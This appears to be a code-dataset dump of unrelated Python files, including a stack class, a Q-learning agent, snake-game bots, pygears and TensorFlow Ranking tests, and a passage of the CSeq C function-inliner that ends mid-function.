content stringlengths 5 1.05M |
|---|
"""
python 实现栈
"""
class Stack():
def __init__(self):
self.items = []
def pop(self):
self.items.pop()
def push(self,item):
self.items.append(item)
def peek(self):
return self.items[len(self.items)-1]
def size(self):
return len(self.items)
def is_empty(self):
return self.items == []
if __name__ == '__main__':
s= Stack()
s.push('h')
s.push('a')
s.pop()
print(s.peek())
print(s.size())
|
import random
class LearningAgent:
def __init__(self, nS, nA):
if nS <= 0: raise ValueError("State Number")
if nA <= 0: raise ValueError("Action Number")
self.nS = nS
self.nA = nA
self.discFact = 0.8
self.epsiRate = 0.8 / nA
self.epsi = [0 for _ in range(nS)]
self.Q = [[] for _ in range(nS)]
self.QCounter = [[] for _ in range(nS)]
self.R = [0 for _ in range(nS)]
self.nst = [{} for _ in range(nS)]
def update(self, st, lenAct):
if 0 > st > self.nS: raise ValueError("State Number")
if 0 > lenAct > self.nA: raise ValueError("Action Number")
if lenAct > len(self.Q[st]):
newAct = lenAct - len(self.Q[st])
self.Q[st].extend(0 for _ in range(newAct))
self.QCounter[st].extend(0 for _ in range(newAct))
def learnUpdate(self, ost, nst, a):
if 0 > nst > self.nS: raise ValueError("State Number")
self.update(ost, a)
try:
self.nst[ost][a][nst] += 1
except KeyError:
if a in self.nst[ost]: pass
else: self.nst[ost][a] = {}
self.nst[ost][a][nst] = 1
def selectactiontolearn(self, st, aa):
self.update(st, len(aa))
if random.random() < self.epsi[st]:
maxQ = max(self.Q[st][:len(aa)])
return random.choice(
[a for a in range(len(aa)) if self.Q[st][a] == maxQ])
else:
minC = min(self.QCounter[st][:len(aa)])
return random.choice(
[a for a in range(len(aa)) if self.QCounter[st][a] == minC])
def selectactiontoexecute(self, st, aa):
self.update(st, len(aa))
return max(range(len(aa)), key=self.Q[st].__getitem__)
def V(self, ost, a):
V = 0
sumEP = 0
for nst in self.nst[ost][a]:
EP = self.nst[ost][a][nst]
if self.Q[nst]:
V += max(self.Q[nst]) * EP
sumEP += EP
return V / sumEP
def learn(self, ost, nst, a, r):
self.learnUpdate(ost, nst, a)
EP = sum(self.QCounter[ost])
self.QCounter[ost][a] += 1
if EP < self.nA:
self.epsi[ost] += self.epsiRate
self.R[ost] = (self.R[ost] * EP + r) / (EP + 1)
self.Q[ost][a] = self.R[ost] + self.discFact * self.V(ost, a)
|
'''
Define a simple "spelling correction" function correct() that takes a string and sees to it that
1) two or more occurrences of the space character is compressed into one, and
2) inserts an extra space after a period if the period is directly followed by a letter.
E.g. correct("This is very funny and cool.Indeed!") should return "This is very funny and cool. Indeed!"
Tip: Use regular expressions!
'''
import re
def correct(x):
x =x.replace('.', '. ')
x = re.sub(' +', ' ', x)
print x
correct ("This is very funny and cool.Indeed!")
|
from random import choice
from snakegame.common import *
def bfs(board, x, y, find):
nodes=[[1, 0, x, y, ""]]
#node format is [1=nothing 0=apple (for sorting reasons),
#distance from start, x, y, dirs useed to get there, find apple, or nothing
height=len(board)
width = len(board[0])
if find == "a":
condition = "found < 8"
elif find == "s":
condition = "len(nodes) < 300"
else:
condition = "len(nodes) < 51"
TARGET="*"
ENTRY="."
DIRS={"U":[-1,0], "D":[1,0], "L":[0,-1], "R":[0,1]}
found=steps=0
explored=[]
checker=[]
while eval(condition):
steps+=1
todo=[]
for node in nodes:
if node not in explored:
x,y, prevdir=node[2],node[3], node[4]
for dr, (dy, dx) in DIRS.items():
nx=(x+dx)%height
ny=(y+dy)%width
if board[ny][nx] == ENTRY:
a=[1, steps, nx, ny, (prevdir+dr)]
if a[2:4] not in checker:
todo.append(a)
checker.append(a[2:4])
elif board[ny][nx] == TARGET:
a=[0, steps, nx, ny, (prevdir+dr)]
if a[2:4] not in checker:
todo.append(a)
checker.append(a[2:4])
found+=1
explored.append(node)
if not todo:
break
for item in todo:
nodes.append(item)
if find == "a":
if sorted(nodes)[0][0]==0:
return sorted(nodes)
else: return " " + str(nodes)
elif find == "s":
return nodes
else:
return len(nodes)-1
def best_no_app(choices):
options={"U":0, "D":0, "L":0, "R":0}
for choice in choices: #finding dr with most places
if choice[-1]:
chose=choice[-1][0]
options[chose]+=1
rec=0
win = "U"
for dr, num in options.items():
if num > rec:
rec=num
win=dr
return win
def win(tries, safety):
record=200
win=""
for item in safety:
stats, moves=item[0], item[1]
if moves > tries:
if stats[1] < record:
record= stats[1]
win=stats[4][0]
return win
def best_with_app(board, choices, x, y, w, h):
safety=[]
for item in choices:
if item[-1] and not item[0]:
xy=directions[item[-1][0]]
moves=bfs(board, (xy[0]+x)%w, (xy[1]+y)%h, "")
safety.append([item, moves])
bad=1
for item in safety:
dirs=directions[item[0][-1][0]]
if bfs(board, x+dirs[0], y+dirs[1], "") > 49:
bad=0
if bad:
return best_no_app(choices)
else:
dr=win(20, safety)
if dr:
return dr
return "U"
def matt_old_bot(board, val):
x = val[0]
y = val[1]
h=len(board)
w=len(board[0])
choices = bfs(board, x, y, "a") #finds apples. If no apples, finds moves
if "[" != str(choices)[0]: #no apples reachable
return best_no_app(eval(choices[1:])) #safety mode
else: #there are apples
return best_with_app(board, choices, x, y, w, h)
def safe_bot(board, val):
print(board, val)
x, y = val
enemies=0
me=board[y][x]
good = ".*"+me+me.lower()
for line in board:
for item in line:
if item not in good:
enemies=1
if enemies:
choices=bfs(board, x, y, "s")
return best_no_app(choices)
else:
return matt_old_bot(board, (x,y))
# Test code to run the snake game.
# Leave the if statement as is, otherwise I won't be able to run your bot with
# the other bots.
if __name__ == '__main__':
from snakegame.engines.pyglet import PygletEngine
p = PygletEngine(25, 25, 50, wrap=True)
p.add_bot(matt_old_bot)
p.add_bot(safe_bot)
p.run()
|
import pytest
from pygears import gear, Intf
from pygears.typing import Tuple, Uint, Integer
from pygears.core.infer_ftypes import TypeMatchError, infer_ftypes
from pygears.util.test_utils import equal_on_nonspace
from pygears.core.gear import GearArgsNotSpecified
def test_templated_type_deduction_multi_related_templates_fail():
expected_err_text = """Ambiguous match for parameter "T1": Uint[2] and Uint[1]
- when matching Tuple[Uint[1], Uint[2], Uint[2]] to Tuple['T1', Uint['T2'], 'T1']
- when deducing type for argument "din" """
params = {
'din': Tuple['T1', Uint['T2'], 'T1'],
'return': Tuple['T1', 'T2']
}
args = {'din': Tuple[Uint[1], Uint[2], Uint[2]]}
with pytest.raises(TypeMatchError) as excinfo:
infer_ftypes(params, args)
assert equal_on_nonspace(str(excinfo.value), expected_err_text)
def test_incomplete_type():
expected_err_text = """Incomplete type: Integer
- when resolving return type \"t\""""
params = {'t': Integer, 'return': b't'}
args = {}
with pytest.raises(TypeMatchError) as excinfo:
infer_ftypes(params, args)
assert equal_on_nonspace(str(excinfo.value), expected_err_text)
def test_incomplete_argument():
@gear
def test(din) -> b'din':
pass
expected_err_text = """Input argument "din" has unresolved type "Integer"\n - when instantiating "test" """
with pytest.raises(GearArgsNotSpecified) as excinfo:
test(Intf(Integer))
assert equal_on_nonspace(str(excinfo.value), expected_err_text)
def test_unresolved_partial_err():
@gear
def consumer(din1, din2) -> b'din':
pass
@gear
def producer(din) -> b'din':
pass
with pytest.raises(GearArgsNotSpecified):
consumer(Intf(Integer)) | producer
|
import logging
class SeleniumUtils(object):
def __init__(self):
super(SeleniumUtils, self).__init__()
@classmethod
def find_a_href(self, categories, param):
for category in categories:
href = category.get_attribute("href")
text = category.text
if text in "Smart Watches":
logging.debug("find a's title <%s>" % text)
return href
|
# Copyright 2018 The TensorFlow Ranking Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input data processing tests for ranking library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.example import example_pb2
from tensorflow.python.client import session
from tensorflow.python.data.ops import readers
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.lib.io import tf_record
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import queue_runner
from tensorflow.python.util.protobuf import compare
from tensorflow_ranking.python import data as data_lib
SEQ_EXAMPLE_PROTO_1 = text_format.Parse(
"""
context {
feature {
key: "query_length"
value { int64_list { value: 3 } }
}
}
feature_lists {
feature_list {
key: "unigrams"
value {
feature { bytes_list { value: "tensorflow" } }
feature { bytes_list { value: ["learning", "to", "rank"] } }
}
}
feature_list {
key: "utility"
value {
feature { float_list { value: 0.0 } }
feature { float_list { value: 1.0 } }
}
}
}
""", example_pb2.SequenceExample())
SEQ_EXAMPLE_PROTO_2 = text_format.Parse(
"""
context {
feature {
key: "query_length"
value { int64_list { value: 2 } }
}
}
feature_lists {
feature_list {
key: "unigrams"
value {
feature { bytes_list { value: "gbdt" } }
feature { }
}
}
feature_list {
key: "utility"
value {
feature { float_list { value: 0.0 } }
feature { float_list { value: 0.0 } }
}
}
}
""", example_pb2.SequenceExample())
CONTEXT_FEATURE_SPEC = {
"query_length":
parsing_ops.FixedLenFeature([1], dtypes.int64, default_value=[0])
}
EXAMPLE_FEATURE_SPEC = {
"unigrams":
parsing_ops.VarLenFeature(dtypes.string),
"utility":
parsing_ops.FixedLenFeature([1], dtypes.float32, default_value=[0.])
}
LIBSVM_DATA = """2 qid:1 1:0.1 3:0.3 4:-0.4
1 qid:1 1:0.12 4:0.24 5:0.5
0 qid:1 2:0.13
"""
class SequenceExampleTest(compare.ProtoAssertions, test.TestCase,
parameterized.TestCase):
def test_parse_from_sequence_example(self):
features = data_lib.parse_from_sequence_example(
ops.convert_to_tensor([
SEQ_EXAMPLE_PROTO_1.SerializeToString(),
SEQ_EXAMPLE_PROTO_2.SerializeToString(),
]),
list_size=2,
context_feature_spec=CONTEXT_FEATURE_SPEC,
example_feature_spec=EXAMPLE_FEATURE_SPEC)
with session.Session() as sess:
sess.run(variables.local_variables_initializer())
queue_runner.start_queue_runners()
feature_map = sess.run(features)
self.assertEqual(
sorted(feature_map), ["query_length", "unigrams", "utility"])
self.assertAllEqual(feature_map["unigrams"].dense_shape, [2, 2, 3])
self.assertAllEqual(
feature_map["unigrams"].indices,
[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2], [1, 0, 0]])
self.assertAllEqual(feature_map["unigrams"].values,
[b"tensorflow", b"learning", b"to", b"rank", b"gbdt"])
self.assertAllEqual(feature_map["query_length"], [[3], [2]])
self.assertAllEqual(feature_map["utility"], [[[0.], [1.]], [[0.], [0.]]])
def test_parse_from_sequence_example_slice(self):
features = data_lib.parse_from_sequence_example(
ops.convert_to_tensor([
SEQ_EXAMPLE_PROTO_1.SerializeToString(),
]),
list_size=1,
context_feature_spec=CONTEXT_FEATURE_SPEC,
example_feature_spec=EXAMPLE_FEATURE_SPEC)
with session.Session() as sess:
sess.run(variables.local_variables_initializer())
queue_runner.start_queue_runners()
feature_map = sess.run(features)
self.assertEqual(
sorted(feature_map), ["query_length", "unigrams", "utility"])
self.assertAllEqual(feature_map["unigrams"].dense_shape, [1, 1, 3])
self.assertAllEqual(feature_map["unigrams"].indices, [[0, 0, 0]])
self.assertAllEqual(feature_map["unigrams"].values, [b"tensorflow"])
self.assertAllEqual(feature_map["query_length"], [[3]])
self.assertAllEqual(feature_map["utility"], [[[0.]]])
def test_parse_from_sequence_example_pad(self):
features = data_lib.parse_from_sequence_example(
ops.convert_to_tensor([
SEQ_EXAMPLE_PROTO_1.SerializeToString(),
]),
list_size=3,
context_feature_spec=CONTEXT_FEATURE_SPEC,
example_feature_spec=EXAMPLE_FEATURE_SPEC)
with session.Session() as sess:
sess.run(variables.local_variables_initializer())
queue_runner.start_queue_runners()
feature_map = sess.run(features)
self.assertEqual(
sorted(feature_map), ["query_length", "unigrams", "utility"])
self.assertAllEqual(feature_map["query_length"], [[3]])
self.assertAllEqual(feature_map["unigrams"].dense_shape, [1, 3, 3])
self.assertAllEqual(feature_map["unigrams"].indices,
[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2]])
self.assertAllEqual(feature_map["unigrams"].values,
[b"tensorflow", b"learning", b"to", b"rank"])
self.assertAllEqual(feature_map["utility"], [[[0.], [1.], [0.]]])
def test_parse_from_sequence_example_missing_framei_exception(self):
missing_frame_proto = text_format.Parse(
"""
feature_lists {
feature_list {
key: "utility"
value {
feature { float_list { value: 0.0 } }
feature { }
}
}
}
""", example_pb2.SequenceExample())
features = data_lib.parse_from_sequence_example(
ops.convert_to_tensor([missing_frame_proto.SerializeToString()]),
list_size=2,
context_feature_spec=None,
example_feature_spec={"utility": EXAMPLE_FEATURE_SPEC["utility"]})
with session.Session() as sess:
sess.run(variables.local_variables_initializer())
queue_runner.start_queue_runners()
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
r"Unexpected number of elements in feature utility"):
sess.run(features)
@parameterized.named_parameters(("with_sloppy_ordering", True),
("with_deterministic_ordering", False))
def test_read_batched_sequence_example_dataset(self, sloppy_ordering):
# Save protos in a sstable file in a temp folder.
serialized_sequence_examples = [
SEQ_EXAMPLE_PROTO_1.SerializeToString(),
SEQ_EXAMPLE_PROTO_2.SerializeToString()
] * 100
data_dir = test.get_temp_dir()
data_file = os.path.join(data_dir, "test_sequence_example.tfrecord")
if file_io.file_exists(data_file):
file_io.delete_file(data_file)
with tf_record.TFRecordWriter(data_file) as writer:
for s in serialized_sequence_examples:
writer.write(s)
batched_dataset = data_lib.read_batched_sequence_example_dataset(
file_pattern=data_file,
batch_size=2,
list_size=2,
context_feature_spec=CONTEXT_FEATURE_SPEC,
example_feature_spec=EXAMPLE_FEATURE_SPEC,
reader=readers.TFRecordDataset,
shuffle=False,
sloppy_ordering=sloppy_ordering)
features = batched_dataset.make_one_shot_iterator().get_next()
self.assertAllEqual(
sorted(features), ["query_length", "unigrams", "utility"])
# Check static shapes for dense tensors.
self.assertAllEqual([2, 1], features["query_length"].get_shape().as_list())
self.assertAllEqual([2, 2, 1], features["utility"].get_shape().as_list())
with session.Session() as sess:
sess.run(variables.local_variables_initializer())
queue_runner.start_queue_runners()
feature_map = sess.run(features)
# Test dense_shape, indices and values for a SparseTensor.
self.assertAllEqual(feature_map["unigrams"].dense_shape, [2, 2, 3])
self.assertAllEqual(
feature_map["unigrams"].indices,
[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2], [1, 0, 0]])
self.assertAllEqual(feature_map["unigrams"].values,
[b"tensorflow", b"learning", b"to", b"rank", b"gbdt"])
# Check values directly for dense tensors.
self.assertAllEqual(feature_map["query_length"], [[3], [2]])
self.assertAllEqual(feature_map["utility"], [[[0.], [1.0]], [[0.], [0.]]])
def test_sequence_example_serving_input_receiver_fn(self):
serving_input_receiver_fn = (
data_lib.build_sequence_example_serving_input_receiver_fn(
input_size=2,
context_feature_spec=CONTEXT_FEATURE_SPEC,
example_feature_spec=EXAMPLE_FEATURE_SPEC))
serving_input_receiver = serving_input_receiver_fn()
self.assertAllEqual(
sorted(serving_input_receiver.features),
["query_length", "unigrams", "utility"])
self.assertEqual(
sorted(serving_input_receiver.receiver_tensors.keys()),
["sequence_example"])
with session.Session() as sess:
sess.run(variables.local_variables_initializer())
queue_runner.start_queue_runners()
feature_map = sess.run(
serving_input_receiver.features,
feed_dict={
serving_input_receiver.receiver_tensors["sequence_example"].name:
[
SEQ_EXAMPLE_PROTO_1.SerializeToString(),
SEQ_EXAMPLE_PROTO_2.SerializeToString()
]
})
# Test dense_shape, indices and values for a SparseTensor.
self.assertAllEqual(feature_map["unigrams"].dense_shape, [2, 2, 3])
self.assertAllEqual(
feature_map["unigrams"].indices,
[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2], [1, 0, 0]])
self.assertAllEqual(feature_map["unigrams"].values,
[b"tensorflow", b"learning", b"to", b"rank", b"gbdt"])
# Check values directly for dense tensors.
self.assertAllEqual(feature_map["query_length"], [[3], [2]])
self.assertAllEqual(feature_map["utility"], [[[0.], [1.0]], [[0.], [0.]]])
class LibSVMUnitTest(test.TestCase, parameterized.TestCase):
def test_libsvm_parse_line(self):
data = "1 qid:10 32:0.14 48:0.97 51:0.45"
qid, features = data_lib._libsvm_parse_line(data)
self.assertEqual(qid, 10)
self.assertDictEqual(
features,
{"32": 0.14, "48": 0.97, "51": 0.45, "label": 1.0}
)
def test_libsvm_generate(self):
doc_list = [
{"1": 0.1, "3": 0.3, "4": -0.4, "label": 2.0},
{"1": 0.12, "4": 0.24, "5": 0.5, "label": 1.0},
{"2": 0.13, "label": 0.0},
]
want = {
"1": np.array([[0.1], [0.], [0.12], [0.]], dtype=np.float32),
"2": np.array([[0.], [0.13], [0.], [0.]], dtype=np.float32),
"3": np.array([[0.3], [0.], [0.], [0.]], dtype=np.float32),
"4": np.array([[-0.4], [0.], [0.24], [0.]], dtype=np.float32),
"5": np.array([[0.], [0.], [0.5], [0.]], dtype=np.float32),
}
np.random.seed(10)
features, labels = data_lib._libsvm_generate(
num_features=5, list_size=4, doc_list=doc_list)
self.assertAllEqual(labels, [2.0, 0.0, 1.0, -1.0])
self.assertAllEqual(
sorted(features.keys()),
sorted(want.keys())
)
for k in sorted(want):
self.assertAllEqual(features.get(k), want.get(k))
def test_libsvm_generator(self):
data_dir = test.get_temp_dir()
data_file = os.path.join(data_dir, "test_libvsvm.txt")
if file_io.file_exists(data_file):
file_io.delete_file(data_file)
with open(data_file, "wt") as writer:
writer.write(LIBSVM_DATA)
want = {
"1": np.array([[0.1], [0.], [0.12], [0.]], dtype=np.float32),
"2": np.array([[0.], [0.13], [0.], [0.]], dtype=np.float32),
"3": np.array([[0.3], [0.], [0.], [0.]], dtype=np.float32),
"4": np.array([[-0.4], [0.], [0.24], [0.]], dtype=np.float32),
"5": np.array([[0.], [0.], [0.5], [0.]], dtype=np.float32),
}
reader = data_lib.libsvm_generator(data_file, 5, 4, seed=10)
for features, labels in reader():
self.assertAllEqual(labels, [2.0, 0., 1.0, -1.0])
self.assertAllEqual(
sorted(features.keys()),
sorted(want.keys())
)
for k in sorted(want):
self.assertAllEqual(features.get(k), want.get(k))
break
if __name__ == "__main__":
test.main()
|
###################################################################################################
# Copyright © 2021 Neal Meswania
# Lisence: MIT
###################################################################################################
import signal
import sys
###################################################################################################
###################################################################################################
###################################################################################################
class SignalHandler:
def __init__(self, main_task):
self._main_task = main_task
###################################################################################################
def Assign(self):
signal.signal(signal.SIGINT, self._HandleSignal)
###################################################################################################
def _HandleSignal(self, sig, frame):
del self._main_task
sys.exit(0)
###################################################################################################
###################################################################################################
###################################################################################################
|
""" CSeq function inlining module
written by Omar Inverso, Gennaro Parlato, University of Southampton.
maintained by Truc Nguyen Lam, University of Southampton.
"""
VERSION = 'inliner-0.1-2016.08.16'
# VERSION = 'inliner-0.0-2014.10.19'
# VERSION = 'inliner-0.0-2014.07.15'
#VERSION = 'inliner-0.0-2014.12.24' # CSeq-1.0beta
#VERSION = 'inliner-0.0-2014.10.31' # CSeq-Lazy-0.6: newseq-0.6a, newseq-0.6c, SVCOMP15
#VERSION = 'inliner-0.0-2014.10.28'
#VERSION = 'inliner-0.0-2014.03.14'
#VERSION = 'inliner-0.0-2014.03.06 (CSeq-Lazy-0.2)'
#VERSION = 'inliner-0.0-2014.02.27'
#VERSION = 'inliner-0.0-2014.02.25'
#VERSION = 'inliner-0.0-2013.12.02'
#VERSION = 'inliner-0.0-2013.10.24-Gennaro-Omar'
"""
Transformations:
- inlining of all the function calls,
for functions which body is defined (except main() and __CSEQ_atomic_ functions)
- renames main() to main_thread()
- in threads:
- pthread_exit; are converted into goto thread_exit; (pthread_exit() argument is ignored)
- return; and return value; are converted into goto thread_exit; (return value is ignored)
- local variables are converted into static local variables (to hold the value across context switches)
Prerequisites:
- no function calls in if, while, for conditions (e.g. if(f(g)), while(cond), ...) ???
(use module extractor.py)
- no overlapping variable names as in regression testcase 102
(use module varnames.py)
Limitations:
- two function in the same expression, nested, e.g.: g(f(x));
TODO:
- make nondet-static option work
- limit recursion depth (otherwise parsing recursive functions will give a python stack overflow)
- handle f(g(x)): g(x) is in n.args therefore at the moment would not be inlined?
Changelog:
2017.08.17 preserve return arguments and pthread_exit arguments for thread
2016.12.20 accomplish todo 3 - rename labels (& corresponding gotos) in inlined blocks of code to avoid label duplication
2016.12.02 add option to keep parameter passing atomically
2016.10.05 don't want to use __cs_init_scalar on pthread types (see initVar function)
2016.09.27 fix bug: problem of init dynamic size array
2016.09.27 fix bug: multiple inline of two functions use the same (global) variable as parameter
2016.09.16 add option to keep static array declaration (no cast to pointer)
2016.08.16 __cs_init_scalar less ubiquitous
2015.10.19 fix in _inlineFunction
2015.07.16 fix inlining function in a label statement (Truc)
2015.07.15 fixed linemapping for inlined function blocks + expanded parameter passing (Truc)
2014.12.09 further code refactory to match the new organisation of the CSeq framework
2014.10.31 bugfix: when dealing with expressions such as: if(!f(x)) would inline the function twice
2014.10.28 inlining optimization: ....
2014.03.14 further code refactory to match module.Module class interface
2014.03.09 bugfix: external module varnames.py to fix regression overlapping variable names (see regression/102,103 )
2014.03.06 bugfix: inliner wrong handling array as parameters (see regression/100_inline_struct_array.c)
2014.02.27 improved indentation in inlined blocks
2014.02.25 switched to module.Module base class for modules
2013.12.02 bugfix: local struct variables not converted into static struct variables (e.g. struct a --> static struct a;)
"""
import copy,re
import pycparser.c_parser, pycparser.c_ast, pycparser.c_generator
from pycparser import c_ast
import core.common, core.module, core.parser, core.utils
class inliner(core.module.Translator):
functionlines = {} # map function names to sets of line numbers
linestofunctions = {} # map from lines to function names
##__functionsToBeInlined = [] # ids of all the functions to be inlined
currentFunction = ['']
currentFunctionParams = [] # while parsing a function call, keeps the list of parameters used for the actual call
inlinedStack = [] # inlined function to add before a statement
indexStack = [] # current index (= functionname_inliningcountforthisfunction) used for labels and gotos
parametersToRemoveStack = [[]]
switchTo = [] # Fix to avoid multiple inliner of two functions with take the same parameter (as a global var, pfscan)
__parsingStruct = False #
# old
funcInlinedCount = {} # number of times a function call has been inlined, by function
recursivebound = 1 # same as unroll
#
keepstaticarray = False
atomicparameter = False
__globalMemoryAccessed = False
__hasatomicbegin = False
__canbemerged = {}
__nondet_static = False
# Keep return and pthread_exit of each thread
__exit_args = {}
def init(self):
self.addInputParam('keepstaticarray', 'keep static array, do not change to pointer version', '', False, True)
self.addInputParam('atomicparameter', 'keep passing parameter atomic', '', False, True)
self.addInputParam('nondet-static', 'use default backend support of nondet static variables', '', False, True)
def loadfromstring(self, string, env):
if self.getInputParamValue('keepstaticarray') is not None:
self.keepstaticarray = True
if self.getInputParamValue('atomicparameter') is not None:
self.atomicparameter = True
if 'unwind' in env.paramvalues:
self.recursivebound = int(env.paramvalues['unwind'])
if self.getInputParamValue('nondet-static') is not None:
self.__nondet_static = True
super(self.__class__, self).loadfromstring(string, env)
''' Check whether or not the input source code has been fully inlined,
i.e. whether every function defined in the original source code has been inlined,
or the function inlining bound has been met.
'''
def inlined(self):
pass
def visit_UnaryOp(self, n):
operand = self._parenthesize_unless_simple(n.expr)
#print "N.OP %s" % n.op
#print "OPERAND: %s" % operand
#print "STACK: %s" % str(self.parametersToRemoveStack[-1])
#
if n.op == 'p++':
return '%s++' % operand
elif n.op == 'p--':
return '%s--' % operand
elif n.op == 'sizeof':
# Always parenthesize the argument of sizeof since it can be
# a name.
return 'sizeof(%s)' % self.visit(n.expr)
elif n.op == '*' and len(self.switchTo) > 0 and operand in self.switchTo[-1]:
return self.switchTo[-1][operand]
else:
return '%s%s' % (n.op, operand)
def visit_Compound(self, n):
s = self._make_indent() + '{\n'
self.indent_level += 1
##print "COMPOUND %s START " % (self.indent_level)
if n.block_items:
globalMemoryAccessed = False
if len(self.currentFunction) > 0:
self.__canbemerged[self.currentFunction[-1]] = False
for stmt in n.block_items:
'''
if hasattr(stmt, 'coord'):
print "COORDS: %s" % (stmt.coord )
else:
print "COORDS NO"
'''
self.__globalMemoryAccessed = False
self.__hasatomicbegin = False
k = self._inlineIfNeeded(stmt)
globalMemoryAccessed = self.__globalMemoryAccessed
if self.__hasatomicbegin and not globalMemoryAccessed and len(self.currentFunction) > 0:
self.__canbemerged[self.currentFunction[-1]] = True
##print "/ \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ /\n"
#######print k
###print "\\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\\n"
s += k
###print "COMPOUND %s END" % self.indent_level
self.indent_level -= 1
s += self._make_indent() + '}\n'
return s
def __isGlobal(self, f, v):
if (v in self.Parser.varNames[''] and v not in self.Parser.varNames[f]): return True
else: return False
def visit_ID(self, n):
# If this ID corresponds either to a global variable,
# or to a pointer...
#
if (self.__isGlobal(self.currentFunction[-1], n.name) and not
n.name.startswith('__cs_thread_local_')):
self.__globalMemoryAccessed = True
return n.name
def visit_ExprList(self, n):
visited_subexprs = []
for expr in n.exprs:
if isinstance(expr, pycparser.c_ast.ExprList):
visited_subexprs.append('{' + self.visit(expr) + '}')
else:
visited_subexprs.append(self.visit(expr))
if visited_subexprs not in self.currentFunctionParams:
self.currentFunctionParams.append(visited_subexprs)
return ', '.join(visited_subexprs)
def visit_FuncDef(self, n):
# Function definitions of inlined functions must disappear (except thread functions).
#
#if n.decl.name in self.__functionsToBeInlined and n.decl.name not in self.Parser.threadName: OMAROMAROMAROMAR
if self.____needsInlining(n.decl.name) and n.decl.name not in self.Parser.threadName and n.decl.name not in self.Parser.funcReferenced:
##return 'int __cs_function_%s_inlined = 1;\n' % n.decl.name;
return ''
self.currentFunction.append(n.decl.name)
decl = self.visit(n.decl)
self.indent_level = 0
body = self.visit(n.body)
# At the bottom of each thread, add a pthread_exit() statement
#
returnStmt = ''
if (self.currentFunction[-1] in self.Parser.threadName or self.currentFunction[-1] == 'main'):
if self.currentFunction[-1] not in self.__exit_args:
self.__exit_args[self.currentFunction[-1]] = '0'
returnStmt = self.INDENT_SPACING + '__exit_%s: ; %s(%s);\n' % (
self.currentFunction[-1],
core.common.changeID['pthread_exit'],
self.__exit_args[self.currentFunction[-1]])
# Continue the visit.
if n.param_decls:
knrdecls = ';\n'.join(self.visit(p) for p in n.param_decls)
body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '}'
block = decl + '\n' + knrdecls + ';\n' + body + '\n'
else:
body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '}'
block = decl + '\n' + body + '\n'
self.currentFunction.pop()
return block
''' Labels in inlined function needs to be renamed, the label needs to be unique in a function scope
TRUC: todo 3
'''
def visit_Goto(self, n):
if len(self.currentFunction) > 0 and self.____needsInlining(self.currentFunction[-1]):
count = 0 if self.currentFunction[-1] not in self.funcInlinedCount else self.funcInlinedCount[self.currentFunction[-1]] - 1
newlabel = n.name + '_' + self.currentFunction[-1] + '_' + str(count)
return 'goto ' + newlabel + ';'
else:
return 'goto ' + n.name + ';'
'''
'''
def visit_FuncCall(self, n):
self.currentFunctionParams = []
fref = self._parenthesize_unless_simple(n.name)
#print "function call: %s" % fref
#print "stack: %s" % str(self.stack)
#print "\n\n"
# Pthread exit()s can only be within thread functions,
# no need to check whether we're in a thread.
#
if fref == core.common.changeID['pthread_exit']:
args = self.visit(n.args)
self.__exit_args[self.currentFunction[-1]] = args
return 'goto __exit_%s ' % (self.currentFunction[-1])
if fref == '__CSEQ_atomic_begin':
self.__hasatomicbegin = True
args = self.visit(n.args)
s = fref + '(' + args + ')'
if n.args is None:
self.currentFunctionParams.append([])
if self.____needsInlining(fref):
if fref not in self.funcInlinedCount:
self.funcInlinedCount[fref] = 0
self.funcInlinedCount[fref] += 1
self.indexStack.append('_%s_%s' % (fref, self.funcInlinedCount[fref]))
reachBound = False
if self._is_recursive(fref) and self.funcInlinedCount[fref] > self.recursivebound:
self.inlinedStack[-1] += '__CSEQ_assume(0);\n' # Stop execution
reachBound = True
else:
self.inlinedStack[-1] += (self._inlineFunction(self.Parser.funcASTNode[fref], n, False))+'\n'
if self.Parser.funcIsVoid[fref]: s = 'DELETETHIS'
else:
if reachBound:
tempIndex = '_%s_%s' % (fref, self.funcInlinedCount[fref] - 1)
s = '__cs_retval_%s' % tempIndex
# reset inline count
self.funcInlinedCount[fref] = 0
else:
s = '__cs_retval_%s' % (self.indexStack[-1])
self.indexStack.pop()
return s
'''
'''
'''
def visit_Return(self, n):
if self.currentFunction[-1] in self.Parser.threadName:
return 'goto __exit_%s; /* return stmt */' % (self.currentFunction[-1])
#return 'goto _RETURN_exit_%s_%s;' % (self.currentFunction, self.funcInlinedCount[self.currentFunction])
elif self.currentFunction[-1] == 'main':
return 'goto __exit_main; /* return stmt in main() */'
s = 'return'
if n.expr: s += ' ' + self.visit(n.expr)
return s + ';'
'''
def visit_Return(self, n):
if len(self.indexStack) > 0:
if self.Parser.funcIsVoid[self.currentFunction[-1]]:
#print "function name %s - is void\n\n" % self.currentFunction[-1]
return 'goto __exit_%s;' % (self.indexStack[-1]) # void
else:
#print "function name %s - is not void (%s)\n\n" % (self.currentFunction[-1], self.Parser.funcBlockOut[self.currentFunction[-1]])
return '__cs_retval_%s = %s; goto __exit_%s;' % (self.indexStack[-1], self.visit(n.expr), self.indexStack[-1]) # non-void
if self.currentFunction[-1] in self.Parser.threadName:
#~return 'goto __exit_%s; /* return stmt */' % (self.currentFunction[-1])
args = self.visit(n.expr) if n.expr else '0'
self.__exit_args[self.currentFunction[-1]] = args
